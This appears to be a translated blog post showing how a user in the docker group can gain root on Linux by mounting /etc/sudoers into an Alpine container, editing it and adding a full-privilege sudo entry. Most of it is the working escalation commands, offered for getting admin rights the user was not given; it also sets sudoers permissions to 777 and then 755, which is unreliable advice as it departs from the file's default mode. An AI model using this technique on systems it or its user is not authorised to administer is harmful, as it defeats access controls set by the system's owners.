How to get access to the admin on Linux using Docker?

budzynskimaciej

Maciej Budzyński

Posted on June 13, 2022

How to get access to the admin on Linux using Docker?

You don't have administrator rights on local hardware? Do you have Linux and Docker? If the answer to the above questions is yes, in this article I will show you how to use Docker to modify the sudoers file, thanks to which you will get administrator privileges.

This article was translated from Polish using Google Translate. The original post can be found on my blog at https://blog.budzynskimaciej.pl.

Prerequisites

The method presented here requires that the restricted user has access to docker commands, i.e. the user belongs to the docker group. Docker configuration requires that the user belongs to this group. This method only works on Linux (tested on Ubuntu).

TLDR

  • Run alpine linux with the file /etc/sudoers mounted as sudoers in the container:
docker run -it -v /etc/sudoers:/sudoers --rm alpine /bin/sh
Enter fullscreen mode Exit fullscreen mode
  • Changing permissions to edit sudoers with vi:
chmod 777 sudoers
vi sudoers
Enter fullscreen mode Exit fullscreen mode
  • Adding the required permissions to the user in the sudoers file (the i key to add an entry):
# A tab is required between user and ALL (TAB once, not 4 spaces)
user    ALL=(ALL:ALL) ALL
Enter fullscreen mode Exit fullscreen mode
  • Exit save from vi:
:wq
Enter fullscreen mode Exit fullscreen mode
  • Re-changing the permissions of the sudoers file to the default values and exiting the container console:
chmod 755 sudoers
exit
Enter fullscreen mode Exit fullscreen mode
  • Verifying changes to the sudoers:
cat /etc/sudoers
sudo su
Enter fullscreen mode Exit fullscreen mode

Description of individual commands

docker run -it -v /etc/sudoers:/sudoers –rm alpine /bin/sh

This command allows you to get an alpine linux image and then fire the container from that image. The -it parameter is responsible for launching interactive mode (keeps STDIN open, even if it's not connected) and allocating a pseudo-TTY. The -v parameter binds the host directory or file to the container volume. In this case, we bind the host file /etc/sudoers to the sudoers file in the root of our container. The --rm parameter causes the created container to be deleted when exiting and exiting the shell. The alpine /bin/sh fragment is responsible for selecting the image from which the container will be created (in this case, linux alpine) and launching the command (program) /bin/sh, i.e. the system shell.

chmod 777 sudoers and vi sudoers

The /etc/sudoers file is protected against editing by default. Due to alpine being a minimalistic linux distro it comes with the vi file editor by default. sudoers file should be edited with visudo, however alpine does not have this installed by default. In order to edit the file, give full permission to the file to the current user using the chmod 777 sudoers command launched in the alpine container. Then you can open the sudoers file using the vi editor with the command: vi sudoers. To enter text in the vi editor, press the i button on the keyboard.

user ALL=(ALL:ALL) ALL

The above entry allows you to add user permissions to execute all commands. The first field indicates the name of the user affected by the rule (user). The first ALL means that this rule applies to all hosts. The second ALL means that user user can run commands as all users. The third ALL means that user user can run commands as all groups. The fourth ALL means that these rules apply to all commands (commands). Remember to keep the appropriate formatting in the file. In Ubuntu, between user and ALL was a single tab spacing (not four spaces). Personally, I'm not sure if using a single space or 4 spaces won't break anything, so I kept the target formatting to be sure.

Exiting vi

To exit the vi editor and save changes, press the esc key on the keyboard, and then type :wq. The commands after the colon are commands for vi. w means that we want to save the changes made to the file and q means close the file.

chmod 755 sudoers and exit

We change the permissions on the sudoers file to the default values before editing, and then exit the container shell with the exit command. Upon departure, the alpine container will be removed. Only the downloaded image will remain on the disk.

cat /etc/sudoers and sudo su

In order to verify the accesses, we can use the command cat /etc/sudoers to check if the entries were added correctly. We can also use the sudo su command to check if we can execute commands as sudo.

Conclusion

As you can see, docker allows you to change user permissions and modify files that we do not have access to by default. The Docker group belongs to the administration groups, so that a user in this group who has access to execute docker commands has the option of any modification of files without the need to access administrator rights.

💖 💪 🙅 🚩
budzynskimaciej
Maciej Budzyński

Posted on June 13, 2022

Join Our Newsletter. No Spam, Only the good stuff.

Sign up to receive the latest update from our blog.

Related